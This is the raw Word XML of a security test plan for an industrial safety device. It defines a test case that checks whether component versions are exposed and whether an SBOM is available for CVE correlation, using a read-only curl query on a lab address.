    <w:p w14:paraId="2E368B66" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6455BAD1" w14:textId="60F39182" w:rsidR="009305A1" w:rsidRDefault="00255D8C" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ004-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SBOM Completeness &amp; Third-Party CVE-Correlation Gap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310E0501" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="009305A1">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9305A1" w14:paraId="4C062CF5"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E2BB1A" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72308FB6" w14:textId="77777777" w:rsidR="009305A1"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305A1" w14:paraId="52321F1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F79CE1" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D4A3076" w14:textId="2A703239" w:rsidR="009305A1" w:rsidRPr="006678DE" w:rsidRDefault="006678DE" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006678DE">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ004-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="7B8A50D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67DEC749" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68901BE0" w14:textId="7FF1D4A0" w:rsidR="009305A1" w:rsidRPr="00611347" w:rsidRDefault="007C79BD"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11347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-004 → CR 7.8 (SBOM limb) / 4-1 SM-9-SM-10 → Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00D67CA6" w14:paraId="30B6F3E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44C3A9A" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B70C809" w14:textId="4B250BD8" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00D8468D"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Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w14:paraId="2D39EA32"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5B8082F" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SVV </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="301EEB69" w14:textId="635A244C" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00D8468D"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">SVV-3 (Vulnerability Testing) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="607AC75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DA4BD8" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E9C627A" w14:textId="1DBFC177" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00C30123" w:rsidP="00C30123">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2640"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C30123">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Demonstrate that the exposed inventory is top-level only and provides no SBOM of the safety-critical third-party components, so their versions cannot be enumerated or CVE-correlated — CR 7.8 met at product granularity but not at component granularity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="08C89E9E"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613D8F4C" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09972BB9" w14:textId="77777777" w:rsidR="00047C55" w:rsidRDefault="00047C55"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47C55">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. From TC-RQ004-01, list all device-exposed version strings. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E59E0C0" w14:textId="77777777" w:rsidR="00047C55" w:rsidRDefault="00047C55"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47C55">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">2. From documentation, list the known constituent third-party components. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F5AABE" w14:textId="77777777" w:rsidR="00047C55" w:rsidRDefault="00047C55"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47C55">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Attempt to derive each component's version from any exposed interface. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11AF2FC7" w14:textId="490FF34D" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00047C55"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47C55">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. For derivable versions, query a vulnerability database (off-lab); record the rest as un-inventoried.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="61118F4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79C527" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="418D3406" w14:textId="5F88DF11" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00DF3AFB"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DF3AFB">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected = FAIL: third-party components are not individually exposed and no SBOM exists → confirms G-2; documented as a CR 7.8 completeness shortfall requiring an SBOM (BSI TR-03183 / ISVS V1.1.1).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79B1E94F" w14:textId="77777777" w:rsidR="009305A1" w:rsidRPr="00AF57B2" w:rsidRDefault="009305A1" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39507216" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="009305A1">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9305A1" w14:paraId="18E4148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358F88" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D03091" w14:textId="77777777" w:rsidR="009305A1"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305A1" w14:paraId="20BF7D9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F531F4" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="598A111D" w14:textId="69E3A2A1" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="004C210D"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C210D">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ004-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="31C4A38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D412EE4" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65A43EE6" w14:textId="77777777" w:rsidR="008E6FC0" w:rsidRDefault="008E6FC0"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E6FC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3912CC32" w14:textId="77777777" w:rsidR="008E6FC0" w:rsidRDefault="008E6FC0"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E6FC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Pi mgmt eth1 = 192.168.50.10; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78B0CD65" w14:textId="75F452A0" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="008E6FC0"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E6FC0">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CVE lookup performed off-lab (no lab↔Internet coupling)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="613C8DA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FC2A4BF" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49371565" w14:textId="06E21F3F" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00200DE1" w:rsidP="00200DE1">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1080"/>
              </w:tabs>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00200DE1">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl (inventory); manual coverage table; NVD lookup off-lab; optional GVM/OpenVAS (ifm CM-008) on the HTTP surface only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="1354245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B12D77E" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A3249A2" w14:textId="77777777" w:rsidR="00BA73DB" w:rsidRPr="00BA73D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 TC-RQ004-02 SBOM-completeness assessment (device side = read-only enumeration)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="563FA0AB" w14:textId="77777777" w:rsidR="00BA73DB" w:rsidRPr="00611347"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611347">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>curl -s http://192.168.0.2/fieldbussetup/fieldbusfirmware -o TC0402_stack.json # PROFIsafe stack ver</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6203B1A3" w14:textId="77777777" w:rsidR="00BA73DB" w:rsidRPr="00BA73D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 Coverage table: exposed-version vs known constituent (NOT exposed by device):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C29B2C" w14:textId="77777777" w:rsidR="00BA73DB" w:rsidRPr="00BA73D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 uC/OS-II (Micrium) [SRIO-1260] -&gt; NOT exposed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC7C279" w14:textId="77777777" w:rsidR="00BA73DB" w:rsidRPr="00BA73D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 PROFIsafe stack (SIL3) [SRIO-1929] -&gt; partially via fieldbusfirmware</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="107C6D7B" w14:textId="77777777" w:rsidR="00BA73DB" w:rsidRPr="00BA73D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 STM32F7 Self-Test Library [SRIO-10766] -&gt; NOT exposed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1080D324" w14:textId="77777777" w:rsidR="00BA73DB" w:rsidRPr="00BA73D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 netX90 PROFINET stack [SRIO-1768] -&gt; NOT exposed</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CE1F3D6" w14:textId="3930BC2F" w:rsidR="009305A1" w:rsidRPr="006669A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 derivable versions -&gt; off-lab NVD query; rest -&gt; "un-inventoried"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="388219F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032860" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A30ADA2" w14:textId="340C0E43" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="006F7A59"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F7A59">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Only the PROFIsafe stack version partially derivable; RTOS/STL/netX90 versions not exposed → no SBOM, no third-party CVE correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00AD4B09" w14:paraId="7EB43F6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22BB561" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11DA4C78" w14:textId="4F98EF82" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="006F7A59"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SBOM absent?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="00316EA1" w14:paraId="5FB3A30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F05762" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16554137" w14:textId="5429310E" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="002E1E25"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2E1E25">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC0402_stack.json, exposed-vs-constituent coverage table, off-lab NVD notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09836C9D" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="009305A1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D364D9" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284930B1" w14:textId="3D3D3E75" w:rsidR="00643D07" w:rsidRDefault="00643D07" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ004-04 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB35D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data-Identification Fingerprint Uniqueness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45458346" w14:textId="77777777" w:rsidR="00643D07" w:rsidRDefault="00643D07" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C374D92" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="009305A1">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9305A1" w14:paraId="64BBE91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A79CE0" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="193A181E" w14:textId="77777777" w:rsidR="009305A1"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305A1" w14:paraId="12027C0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7EA58C0" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="145B6A1C" w14:textId="02FB652B" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="00B1273F"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1273F">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ004-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009305A1" w:rsidRPr="001604A0" w14:paraId="481A28FF"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45CF9CE" w14:textId="77777777" w:rsidR="009305A1" w:rsidRDefault="009305A1" w:rsidP="00BE3CFC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DE7FE77" w14:textId="09DBD1D3" w:rsidR="009305A1" w:rsidRPr="006669AB" w:rsidRDefault="002C1914"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2C1914">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-004 → CR 7.8 (data limb) → Asset B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
